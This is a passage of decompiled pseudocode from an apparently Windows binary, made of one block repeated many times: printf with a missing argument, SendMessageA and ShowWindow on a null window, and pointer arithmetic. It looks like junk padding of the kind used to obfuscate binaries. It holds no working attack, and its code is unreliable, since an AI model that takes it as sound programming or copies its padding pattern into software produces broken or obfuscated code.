						printf("Result is:\nalpha=%f");
						_t1041 = _t1040 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1041 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1042 = _t1041 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1042 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1043 = _t1042 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1043 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1044 = _t1043 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1044 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1045 = _t1044 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1045 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1046 = _t1045 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1046 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1047 = _t1046 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1047 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1048 = _t1047 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1048 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1049 = _t1048 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1049 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1050 = _t1049 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1050 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1051 = _t1050 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1051 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1052 = _t1051 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1052 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1053 = _t1052 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1053 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1054 = _t1053 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1054 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1055 = _t1054 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1055 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1056 = _t1055 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1056 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1057 = _t1056 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1057 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1058 = _t1057 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1058 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1059 = _t1058 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1059 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1060 = _t1059 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1060 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1061 = _t1060 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1061 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1062 = _t1061 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1062 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1063 = _t1062 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1063 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1064 = _t1063 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1064 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1065 = _t1064 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1065 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1066 = _t1065 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1066 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1067 = _t1066 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1067 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1068 = _t1067 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1068 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1069 = _t1068 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1069 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1070 = _t1069 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1070 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1071 = _t1070 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1071 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1072 = _t1071 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1072 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1073 = _t1072 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1073 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1074 = _t1073 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1074 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1075 = _t1074 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1075 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1076 = _t1075 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1076 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1077 = _t1076 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1077 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1078 = _t1077 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1078 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1079 = _t1078 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1079 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1080 = _t1079 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1080 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1081 = _t1080 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1081 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1082 = _t1081 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1082 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1083 = _t1082 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1083 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1084 = _t1083 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1084 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1085 = _t1084 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1085 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1086 = _t1085 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1086 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1087 = _t1086 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1087 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1088 = _t1087 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1088 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1089 = _t1088 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1089 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1090 = _t1089 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1090 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1091 = _t1090 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1091 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1092 = _t1091 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1092 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1093 = _t1092 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1093 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1094 = _t1093 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1094 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1095 = _t1094 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1095 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1096 = _t1095 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1096 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1097 = _t1096 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1097 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1098 = _t1097 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1098 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1099 = _t1098 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1099 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1100 = _t1099 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1100 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1101 = _t1100 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1101 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1102 = _t1101 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1102 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1103 = _t1102 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1103 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1104 = _t1103 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1104 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1105 = _t1104 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1105 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1106 = _t1105 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1106 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1107 = _t1106 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1107 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1108 = _t1107 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1108 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1109 = _t1108 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1109 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1110 = _t1109 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1110 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1111 = _t1110 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1111 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1112 = _t1111 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1112 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1113 = _t1112 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1113 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1114 = _t1113 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1114 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1115 = _t1114 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1115 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1116 = _t1115 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1116 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1117 = _t1116 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1117 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1118 = _t1117 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1118 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1119 = _t1118 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1119 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1120 = _t1119 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1120 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1121 = _t1120 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1121 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1122 = _t1121 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1122 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1123 = _t1122 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1123 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1124 = _t1123 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1124 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1125 = _t1124 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1125 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1126 = _t1125 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1126 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1127 = _t1126 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1127 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1128 = _t1127 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1128 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1129 = _t1128 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1129 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1130 = _t1129 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1130 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1131 = _t1130 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1131 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1132 = _t1131 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1132 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1133 = _t1132 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1133 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1134 = _t1133 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1134 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1135 = _t1134 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1135 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1136 = _t1135 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1136 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1137 = _t1136 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1137 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1138 = _t1137 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1138 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1139 = _t1138 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1139 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1140 = _t1139 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1140 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1141 = _t1140 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1141 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1142 = _t1141 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1142 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1143 = _t1142 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1143 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1144 = _t1143 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1144 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1145 = _t1144 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1145 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1146 = _t1145 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1146 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1147 = _t1146 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1147 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1148 = _t1147 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1148 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1149 = _t1148 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1149 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1150 = _t1149 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1150 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1151 = _t1150 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1151 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1152 = _t1151 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1152 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1153 = _t1152 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1153 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1154 = _t1153 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1154 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1155 = _t1154 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1155 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1156 = _t1155 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1156 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1157 = _t1156 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1157 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1158 = _t1157 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1158 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1159 = _t1158 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1159 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1160 = _t1159 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1160 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1161 = _t1160 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1161 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1162 = _t1161 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1162 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1163 = _t1162 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1163 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1164 = _t1163 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1164 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1165 = _t1164 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1165 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1166 = _t1165 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1166 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1167 = _t1166 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1167 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1168 = _t1167 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1168 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1169 = _t1168 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1169 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1170 = _t1169 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1170 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1171 = _t1170 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1171 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1172 = _t1171 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1172 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1173 = _t1172 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1173 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1174 = _t1173 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1174 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1175 = _t1174 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1175 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1176 = _t1175 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1176 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1177 = _t1176 + 0xc;
